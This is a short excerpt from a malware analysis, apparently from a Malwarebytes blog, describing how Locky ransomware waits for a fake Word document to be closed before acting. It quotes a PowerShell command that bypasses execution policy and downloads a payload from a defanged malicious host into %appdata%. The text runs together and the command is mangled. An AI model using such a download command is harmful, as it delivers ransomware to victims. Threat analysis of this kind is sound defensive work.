The Locky ransomware attempts to evade detection by relying once more on simple, yet effective user interaction. It waits until the fake Word document is closed by the user before it starts to invoke a set of commands. The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note: Strikes when you least expect its.C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -Exec Bypass -Command (New-Object SystemNet.WebClient).DownloadFile(http://newhostrcm[.]top/admin.php?f=1, $env:APPDATA + sATTfJY.”]
Source: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-anti-sandbox-feature/